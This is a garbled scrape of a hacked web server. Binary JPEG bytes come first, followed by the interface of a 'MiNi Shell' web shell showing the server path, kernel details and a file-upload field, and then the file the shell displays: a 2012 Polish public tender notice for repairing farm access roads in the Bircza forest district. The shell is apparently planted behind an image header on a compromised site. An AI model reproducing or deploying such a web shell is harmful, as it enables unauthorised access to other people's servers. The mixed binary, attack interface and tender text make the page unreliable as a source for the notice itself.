JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/192446-N-2012.html

<p class="kh_header"><b>Bircza: Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w Nadleśnictwie Bircza w 2012r.</b><br>
<b>Numer ogłoszenia: 192446 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bircza , Stara Bircza 99, 37-740 Bircza, woj. podkarpackie, tel. 016 6725004, 6755343, faks 016 6725004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w Nadleśnictwie Bircza w 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w Nadleśnictwie Bircza w 2012r w leśnictwach:  Arłamów, Leszczawa, Kuźmina, Trójca, Pechnów i Łodzinka
1.	Zakres prac obejmuje:
- oczyszczenie mechaniczne nawierzchni z płyt JOMBO z namułu i darni - 5075 m2
- rozebranie nawierzchni z płyt drogowych betonowych grub. 12 cm  - płyty JOMBO - 938 m2
- wykonanie  nawierzchni z płyt drogowych betonowych wielootworowych  grub. do 12 cm - płyty JOMBO na podsypce piaskowej (płyty z rozbiórki - materiał Inwestora) - 938 m2 
- wykonanie  nawierzchni z płyt drogowych betonowych wielootworowych  grub. do 12 cm - płyty JOMBO na podsypce piaskowej (płyty nowe - materiał Wykonawcy robót) - 20 m2
- wykonanie umocnienia przejazdu przez potok- wykonanie nawierzchni z płyt drogowych żelbetowych grub. 15 cm z transportem płyt - 9 m2
- wykonanie przepustów rurowych pod zjazdami - rury betonowe o śr. 50 lub 40 cm -  - 24 mb
- wykonanie podbudowy z pospółki grub. 15 cm  - 90 m2
- formowanie nasypów  o wys. do 3 m spycharkami wraz z zagęszczeniem - 72 m3
- uzupełnienie ubytków gruntu (likwidacja kolein) - ręczne formowanie nasypów z gruntu kat. III-IV dostarczonego samochodami samowyładowczymi - 48 m3
- mechaniczne profilowanie powierzchni dojazdu ze ścięciem nierówności od 15 cm do 40 cm, usunięciu nadmiaru gruntu poza strefę robót oraz zagęszczeniu wykonanej powierzchni szlaku - 980 m3
- mechaniczne karczowanie gęstych krzaków i podszycia - 0,719 ha
- wycinkę i karczowanie drzew o średnicy pnia do 40 cm - 47 szt.
- mechaniczne karczowanie pni drzew o średnicach 25- 60 cm - 63 szt.
- wykonanie dylowanki z drewna odpadowego pozyskiwanego na miejscu z odległości do 100 m - (drewno materiał Zamawiającego) przejazd przez potok, dylowanka dwuwarstwowa - 40 m2
- wykonanie odwodnienia dojazdów za pomocą: 
a) rowów odpływowych, (pogłębienie) urobek wbudować w nasyp - 187,32 m3
b) sączka poprzecznego z tłucznia - pospółki - 16 mb
c) sączka poprzecznego z drewna odpadowego pozyskiwanego na miejscu (z odległości do 100 m) wraz z wykonaniem robót ziemnych - drewno materiał Zamawiającego - 4 m3
Przedmiot zamówienia został podzielony na 3 części. 
2. Szczegółowy opis przedmiotu zamówienia z podziałem na części zawiera:
- charakterystyka obiektów, zakres prac i warunki wykonania zamówienia stanowiąca załącznik nr 2 do specyfikacji istotnych warunków zamówienia (w dalszej treści zwanej SIWZ), 
- wzór kosztorysu ofertowego (zawierający elementy przedmiaru robót) stanowiący załącznik nr 1b do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dziennik Ustaw z 2010 r. nr 113, poz.759 ze zm. - zwanej w dalszej treści Ustawą), polegających na wykonaniu usług zgodnych z przedmiotem niniejszego zamówienia (rozszerzeniu zakresu świadczonych robót) stanowiących do 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające mogą być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnione warunki udziału w postępowaniu, jeżeli Wykonawca wykaże, iż posiada polisę - ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną kwotę 20 000 zł (dwadzieścia tysięcy zł) oraz złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy.
W przypadku braku polisy, Wykonawca przedstawi inny dokument potwierdzający, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia. W przypadku, gdy dokumenty złożone przez Wykonawcę, w celu potwierdzenia posiadania ubezpieczenia od odpowiedzialności cywilnej, zawierają dane określone w innych walutach niż określone w SIWZ, Zamawiający dokona ich przeliczenia wg średniego kursu NBP obowiązującego (publikowanego) na dzień wystawienia dokumentu potwierdzającego posiadanie ubezpieczenia. 
Tabela kursów walut na stronie internetowej http://www.nbp.pl/kursy/kursy.html
Wykonawcy występujący jako konsorcjum składają wspólną polisę na wymaganą kwotę albo oddzielne polisy dla każdego z członków konsorcjum, z zastrzeżeniem, że suma ubezpieczenia członków konsorcjum wynosi nie mniej niż 20 000,00 złotych. 
Ocena warunku na podstawie informacji i danych zawartych w dokumentach, o których mowa w pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać ponadto następujące dokumenty i oświadczenia
a)	Pełnomocnictwo do złożenia oferty, o ile nie wynika ono z innych dokumentów załączonych do oferty, a także pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), jeśli dotyczy
b)	Wypełniony formularz ofertowy zgodny w treści z wzorem stanowiącym załącznik nr 1a do SIWZ
c)	Kosztorys ofertowy wypełniony wg. załączonego wzoru -  załącznik nr 1b do SIWZ
d)	Wykaz części zamówienia, które Wykonawca zamierza zlecić do wykonania Podwykonawcom załącznik nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana terminu wykonania umowy
Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, jeżeli wystąpią następujące czynniki uniemożliwiające realizację przedmiotu zamówienia w terminie:
a)	w przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez oferentów lub inne podmioty, w wyniku którego umowa zostanie zawarta po dniu 06.07.2012r,
b)	udzielenia zamówień dodatkowych, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
c)	wystąpienia siły wyższej, której wystąpienie ma wpływ na realizację umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Poprzez okoliczności uzasadniające zmianę terminu umowy rozumie się: osunięcia gruntów, długotrwałe intensywne opady, powódź, kolizje transportowe lub komunikacyjne, odkrycia w gruncie przedmiotów niemożliwych wcześniej do zidentyfikowania i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec,
d)	czasowego wstrzymania realizacji prac przez Zamawiającego z przyczyn wynikających z działań Zamawiającego, których nie można było przewidzieć pomimo zachowania należytej staranności,
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość przedłużenia terminu zakończenia robót określonego w punkcie VII SIWZ. Przedłużenie terminu zakończenia robót nastąpi w formie aneksu do umowy i wymaga pisemnego wniosku Wykonawcy wraz z uzasadnieniem, zaakceptowanego przez Zamawiającego. Przedłużenie terminu zakończenia prac nastąpi o okres niezbędny dla zakończenia robót uwzględniający okres wystąpienia czynników uniemożliwiających terminowe wykonanie przedmiotu umowy.
2. Zmiana zakresu przedmiotu umowy w sprawie niniejszego zamówienia lub sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany  przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy (zaistnienie warunków wpływających na zakres lub sposób wykonywania przedmiotu umowy):
a)	wydanie przez właściwy organ decyzji administracyjnej wyłączającej lub ograniczającej przedmiot zamówienia opisany w specyfikacji istotnych warunków zamówienia.
b)	ograniczenie przedmiotu zamówienia przez Zamawiającego wynikające z obiektywnych i uzasadnionych przyczyn. Z  szczególności zmniejszenie zakresu prac nastąpi w przypadku, gdy wykonanie całego zakresu prac stwierdzone na etapie realizacji zamówienia (po wykonaniu prac poprzedzających) stanie się zbędne dla właściwego funkcjonowania dojazdu. Zmiany takie nastąpią w formie aneksu do umowy.
W przypadku zmniejszenia zakresu robót, z wynagrodzenia Wykonawcy zostanie   potrącona odpowiednia kwota obliczona  w oparciu o zaoferowane ceny jednostkowe wynikające  z kosztorysu ofertowego i  zredukowany zakres usług. 
3.  Zmiana wynagrodzenia umownego 
 Zamawiający ustala zmianę wynagrodzenia umownego w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT. W przypadku zmiany stawki podatku VAT, cena netto za wykonanie przedmiotu umowy (części umowy) nie ulega zmianie, a wartość wynagrodzenia zostanie obliczona w oparciu o stawkę podatku VAT obowiązującą na dzień powstania obowiązku podatkowego. Nie dotyczy to przypadku objęcia obowiązkiem podatkowym Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT. Takie zmiany nie wymagają aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Bircza, adres: Stara Bircza 99, 37-740 Bircza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 12:00, miejsce: Nadleśnictwo Bircza, adres: Stara Bircza 99, 37-740 Bircza, pokój 211 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane ze środków UE.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w leśnictwie Arłamów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
- oczyszczenie mechaniczne nawierzchni z płyt JOMBO z namułu i darni - 4900 m2
- rozebranie nawierzchni z płyt drogowych betonowych grub. 12 cm  - płyty JOMBO - 815 m2
- wykonanie  nawierzchni z płyt drogowych betonowych wielootworowych  grub. do 12 cm - płyty JOMBO na podsypce piaskowej (płyty z rozbiórki - materiał Inwestora) - 815 m2 
- wykonanie podbudowy z pospółki grub. 15 cm  - 90 m2
- formowanie nasypów  o wys. do 3 m spycharkami wraz z zagęszczeniem - 72 m3
- uzupełnienie ubytków gruntu (likwidacja kolein) - ręczne formowanie nasypów z gruntu kat. III-IV dostarczonego samochodami samowyładowczymi - 48 m3
- mechaniczne profilowanie powierzchni dojazdu ze ścięciem nierówności od 15 cm do 40 cm, usunięciu nadmiaru gruntu poza strefę robót oraz zagęszczeniu wykonanej powierzchni szlaku - 980 m3
- mechaniczne karczowanie gęstych krzaków i podszycia - 0,719 ha
- wycinkę i karczowanie drzew o średnicy pnia do 40 cm - 47 szt.
- mechaniczne karczowanie pni drzew o średnicach 25- 60 cm - 63 szt.
- wykonanie dylowanki z drewna odpadowego pozyskiwanego na miejscu z odległości do 100 m - (drewno materiał Zamawiającego) przejazd przez potok, dylowanka dwuwarstwowa - 40 m2
- wykonanie odwodnienia dojazdów za pomocą sączka poprzecznego z pospółki - 16 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w leśnictwie Leszczawa i  Kuźmina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
- wykonanie umocnienia przejazdu przez potok- wykonanie nawierzchni z płyt drogowych żelbetowych grub. 15 cm z transportem płyt - 9 m2
- wykonanie przepustów rurowych pod zjazdami - rury betonowe o śr. 50 lub 40 cm -  - 18 mb
- formowanie nasypów  o wys. do 3 m spycharkami wraz z zagęszczeniem - 72 m3
- mechaniczne profilowanie powierzchni dojazdu ze ścięciem nierówności od 15 cm do 40 cm, usunięciu nadmiaru gruntu poza strefę robót oraz zagęszczeniu wykonanej powierzchni szlaku - 572 m3
- mechaniczne karczowanie gęstych krzaków i podszycia - 0,096 ha
- wycinkę i karczowanie drzew o średnicy pnia do 30 cm - 15 szt.
- mechaniczne karczowanie pni drzew o średnicach 25- 60 cm - 56 szt.
- wykonanie odwodnienia dojazdów za pomocą rowów odpływowych, (pogłębienie) urobek wbudować w nasyp - 159,72 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawa dojazdów do łąk i gruntów uprawianych rolniczo w     leśnictwie Trójca, Pechnów i Łodzinka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
- oczyszczenie mechaniczne nawierzchni z płyt JOMBO z namułu i darni - 175 m2
- rozebranie nawierzchni z płyt drogowych betonowych grub. 12 cm  - płyty JOMBO - 123 m2
- wykonanie  nawierzchni z płyt drogowych betonowych wielootworowych  grub. do 12 cm - płyty JOMBO na podsypce piaskowej (płyty z rozbiórki - materiał Inwestora) - 123 m2 
- wykonanie  nawierzchni z płyt drogowych betonowych wielootworowych  grub. do 12 cm - płyty JOMBO na podsypce piaskowej (płyty nowe - materiał Wykonawcy robót) - 20 m2
- wykonanie przepustów rurowych pod zjazdami - rury betonowe o śr. 40 cm -  - 6 mb
- uzupełnienie ubytków gruntu (likwidacja kolein) - ręczne formowanie nasypów z gruntu kat. III-IV dostarczonego samochodami samowyładowczymi - 48 m3
- mechaniczne profilowanie powierzchni dojazdu ze ścięciem nierówności od 15 cm do 40 cm, usunięciu nadmiaru gruntu poza strefę robót oraz zagęszczeniu wykonanej powierzchni szlaku - 198 m3
- mechaniczne karczowanie gęstych krzaków i podszycia - 0,623 ha
- wycinkę i karczowanie drzew o średnicy pnia do 30 cm - 32 szt.
- mechaniczne karczowanie pni drzew o średnicach 31-40 cm - 7 szt.
- wykonanie dylowanki z drewna odpadowego pozyskiwanego na miejscu z odległości do 100 m - (drewno materiał Zamawiającego) przejazd przez potok, dylowanka dwuwarstwowa - 40 m2
- wykonanie odwodnienia dojazdów za pomocą: 
a) rowów odpływowych, (pogłębienie) urobek wbudować w nasyp - 27,60 m3
b) sączka poprzecznego z drewna odpadowego pozyskiwanego na miejscu (z odległości do 100 m) wraz z wykonaniem robót ziemnych - drewno materiał Zamawiającego - 4 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com